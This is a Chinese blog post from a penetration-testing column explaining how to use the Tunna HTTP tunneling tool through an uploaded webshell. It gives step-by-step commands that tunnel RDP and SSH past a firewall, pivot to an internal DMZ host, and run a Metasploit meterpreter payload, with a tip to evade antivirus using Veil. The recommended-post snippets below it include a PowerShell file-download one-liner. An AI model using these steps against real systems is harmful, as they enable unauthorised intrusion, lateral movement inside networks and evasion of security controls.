HTTP tunneling工具-端口转发

最新推荐文章于 2024-04-17 07:01:12 发布
最新推荐文章于 2024-04-17 07:01:12 发布
阅读量4.6k 收藏 1
点赞数
分类专栏: 渗透测试

原理:就是个HTTP tunneling工具

!php
+——————————————-+ +——————————————-+

Local HostRemote Host
+———-+ +————++————-++————+ +———-+
Client App+—–>
+———-+ +————++————-++————+ +———-+

+——————————————-+ +—————————————— +
可以看出该工具先使用proxy.py监听本地一个端口,然后连接部署在远程WEB的webshell,远端的webshell会把端口转发请求转发到本地或者本地内网远程的主机,从而实现HTTP tunneling.这对于内网入侵来说,是很有用的一个工具.

该工具看起来是不是有似曾相识的感觉,恩.其实和reduh原理是一样的,不过tunna更稳定,速度更快.

下载地址是:http://www.secforce.com/media/tools/tunna_v0.1.zip

下面讲解4个实例,就能掌握该工具使用方法了.

实例1:

网站对外只开放了80端口,其他的端口都是关闭的,通过CVE-2013-225得到JSP的WEBSHELL后,上传conn.jsp,做转发,实现连接本机的其他端口.直接扫描发现3389是关闭的

mickey@pentest:~# nmap -sS -p3389 219.x.x.x

Starting Nmap 6.40 ( http://nmap.org ) at 2013-09-26 22:47 EDT
Nmap scan report for 219.x.x.x
Host is up (0.0088s latency).
PORT     STATE SERVICE
3389/tcp close  
通过webshell上传conn.jsp到主机上,本地开始连接

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 3389 -v
参数含义如下:

-l 表示本地监听的端口
-r 远程要转发的端口
-v 详细模式
然后本地执行

rdesktop 127.0.0.1:1234
就可以连接到目标的3389

这里写图片描述

实例2:

对于有些服务,比如SSH,还需要添加-s参数,才能保证连接的时候不会中断.

python proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -r 22 -v -s

ssh localhost -p 1234

这里写图片描述

实例3:

场景:已经得到DMZ区的一台主机的JSPSHELL,该主机的内网IP是172.16.100.20,通过查点,发现DMZ区还有其他的主机(172.16.100.20),并且开放了3389,我们想利用HTTP tunneling,连接到172.16.100.20的3389,命令如下

python2.7 proxy.py -u http://219.x.x.x/conn.jsp -l 1234 -a 172.16.100.20 -r 3389
这里多了一个-a参数,意义是要转发的IP

实例4:

对于喜欢metasploit的朋友,该工具也支持,不过如果对方有杀软的话,建议先用veil做好meterpreter的免杀.

首先把tunna_exploit.rb拷贝到msf的modules/exploits/windows/misc目录.

cp ~/tunna_exploit.rb /root/metasploit-framework/modules/exploits/windows/misc
然后开始利用

msf > use exploit/windows/misc/tunna_exploit
msf exploit(tunna_exploit) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(tunna_exploit) > set RHOST 1.3.3.7  <-- 注意这里是指本地的公网IP
RHOST => 1.3.3.7
msf exploit(tunna_exploit) > set TARGETURI http://219.x.x.x:8080/conn.jsp
TARGETURI => http://219.x.x.x:8080/conn.jsp
msf exploit(tunna_exploit) > set VERBOSE true
VERBOSE => true
msf exploit(tunna_exploit) > exploit -j
tunna除了支持jsp还支持以下环境和脚本

conn.jsp Tested on Apache Tomcat (windows + linux) conn.aspx Tested on IIS 6+8 (windows server 2003/2012) conn.php Tested on LAMP + XAMPP + IIS (windows + linux)

使用的时候需要注意:metasploit里的脚本只对应metasploit使用.

pyphrb
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[万能工具类] HttpUtil
下里巴人
03-04 437
*/ public class HttpFastUtils { private static Logger logger = LogManager.getLogger(HttpFastUtils.class.getName()); /** * post请求 * * @param url url地址 * @param objString 实体类String * @return String */ publ...
java Http请求工具
weixin_38441570的博客
03-15 333
import java.io.BufferedReader; import java.io.IOException; import java.io.InputStream; import java.io.InputStreamReader; import java.io.PrintWriter; import java.net.ConnectException; import java.net.SocketTimeoutException; import java.net.URL; import java.
一款开源网络转发、代理软件,解决跨网通信问题
zhaoyu16的博客
12-01 3230
原创转发、代理软件,解决跨区、跨网段网络通信问题
Chisel:一款基于HTTP的快速稳定TCPUDP隧道工具_tcp转udp隧道工具
04-17 1228
该项目包目前由Fedora社区进行维护,如果你遇到了关于RPM使用的问题,可以使用这个问题跟踪工具https://bugzilla.redhat.com/buglist.cgi?在内部,这是使用SSH提供的密码验证方法实现的。点击【http://blog.gopheracademy.com/go-and-ssh/】了解更多关于SSH加密的信息。这个Demo应用程序还会运行一个简单的文件服务器(端口为:3000),由于Heroku防火墙的存在,我们是无法直接访问它的。客户端使用指数回退自动重新连接;
windows 下端口转发 端口映射工具 passport 端口映射
nongcunqq的博客
11-14 1528
下载地址参考。
内网代理转发以及httpserver
whojoe的博客
01-21 838
内网代理转发以及httpserverpythonhttp服务器windows文件下载ew参考文章 pythonhttp服务器 python2 python -m SimpleHTTPServer 1337 python3 python -m http.server 1337 php5.4 php -S 0.0.0.0:1337 windows文件下载 powershell powershell (new-object System.Net.WebClient).DownloadFile('http:/
Linux远程连接工具——Putty
12-05
2. Tunneling(隧道):可以创建端口转发,将本地端口的流量通过SSH隧道转发到远程服务器,实现安全的数据传输。 3. 集成到其他应用:Putty可与Windows的任务计划程序结合,定时执行远程命令;也可以与其他工具集成...
BvSshClient-Inst_8.45.exe
01-04
Bitvise SSH Client最新版是一款十分专业的端口转发工具,Bitvise SSH Client最新版支持socks4、socks4 a、socks5 和 http 连接代理隧道协议/支持pem证书,可以帮助大家轻松快捷的对本地文件和远端文件进行管理,...
不改权限远程访问MySql服务器
04-09
SSH隧道可以将远程MySQL服务器上的端口转发到本地机器,从而在保持安全的同时实现远程访问。具体操作步骤如下: 1. 安装SSH客户端:在本地计算机上,确保已经安装了SSH客户端,如OpenSSH(在Unix-like系统中)或...
Bitvise SSH Client 8.44[2020-10-09]
10-09
Bitvise SSH Client最新版是一款十分专业的端口转发工具,Bitvise SSH Client最新版支持socks4、socks4 a、socks5 和 http 连接代理隧道协议/支持pem证书,可以帮助大家轻松快捷的对本地文件和远端文件进行管理,...
BvSshClient-9.18.exe(2022-05-07)
05-07
Bitvise SSH Client最新版是一款十分专业的端口转发工具,Bitvise SSH Client最新版支持socks4、socks4 a、socks5 和 http 连接代理隧道协议/支持pem证书,可以帮助大家轻松快捷的对本地文件和远端文件进行管理,...
完全免费的一款IP端口转发工具,集成各种服务器常用小工具
11-19
这是一款完全免费的VB小工具,集端口映射 路由追踪 ARP查询 远程修改等常用小功能一键完成操作, 纯命令开发 免费使用!
tunna实用工具
03-25
tunna实用工具
go-http-proxy:转发请求的HTTP代理,对公开安全终结点很有用
04-29
http代理 转发请求的HTTP代理,对公开安全终结点很有用。 演示版 标准查询 在转发给定请求的路径中指定URL,例如 映射查询 设置PATH_MAPPING env var可以根据映射的主机使用简写路径,对于需要基本身份验证的网站很有用),例如 (简单请求转发) (带有基本身份验证的请求转发) 配置 以下环境变量允许自定义应用程序 PORT=8080 // default port on which the http-proxy listen PATH_MAPPING={} // key/value of paths matching hosts, default is an empty object 港口 可以由您选择的值代替 PATH_MAPPING 匹配主机的路径的可选JSON对象。 例如,如果您要公开公开Sonarqube徽章,因为它们需要基本身份验证: PAT
weblogic HTTP tunneling问题
sjw的窝
10-26 455
 weblogic 9.2.3 JDK 1.5.0_22 AdminServer的日志一直在刷如下信息: &lt;2012-10-26 下午02时42分00秒 CST&gt; &lt;Info&gt; &lt;ServletContext-/bea_wls_internal&gt; &lt;ETL&gt; &lt;custv_admin&gt; &lt;[ACTIVE] ExecuteT...
端口映射,数据转发工具
btlong520的博客
12-10 6094
一、研发背景 由于公司的一套系统,是以局域网为单位。 当前网络结构:   云服务器 S          (有公网固定IP)         |   检测平台服务器 T    (可以上网,但不是固定IP)        |    检测机 A    (不能连外网,但可以和T互相连接) 这样的网络结构,就导致了我在外网想查看检测机A的程序运行情况就变得异常的困难,在苦思冥想解决方
linux下最简单好用的的端口转发工具
weixin_44265488的博客
04-01 32
官网地址http://www.rinetd.com/ 软件下载 wget http://www.rinetd.com/download/rinetd.tar.gz 解压安装 tar zxvf rinetd.tar.gz make make install 编辑配置 vi /etc/rinetd.conf 0.0.0.0 8080 172.19.94.3 8080 0...
tunna类似redush的工具
cnbird's blog
09-30 1947
http://www.secforce.com/media/tools/tunna_v0.1.zip
5、内网渗透之端口转发与代理工具总结
Fly_鹏程万里
06-10 5280
理论上,任何接入互联网的计算机都是可访问的,但是如果目标主机处于内网,而我们又想和该目标主机进行通信的话,就需要借助一些端口转发工具来达到我们的目的注:文中提到的所有工具下载地址 https://github.com/Brucetg/Pentest-tools一、LCXlcx.exe是一个端口转发工具,有Windows版和Linux版两个版本,Windows版是lcx.exe,Linux版为por...
SecureCRT设置 端口转发-
最新发布
06-25
在SecureCRT中设置端口转发(也称为SSH隧道或Tunneling)可以帮助你通过一个已建立的SSH连接来透明地传输数据到目标服务器,通常用于访问受限的网络资源。 以下是设置SecureCRT端口转发的基本步骤: 1. **打开...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值